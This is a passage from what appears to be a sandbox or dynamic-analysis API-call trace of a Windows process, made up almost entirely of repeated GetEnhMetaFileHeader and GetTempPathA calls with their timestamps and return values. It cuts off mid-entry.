lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.296] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.297] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.315] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.316] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: 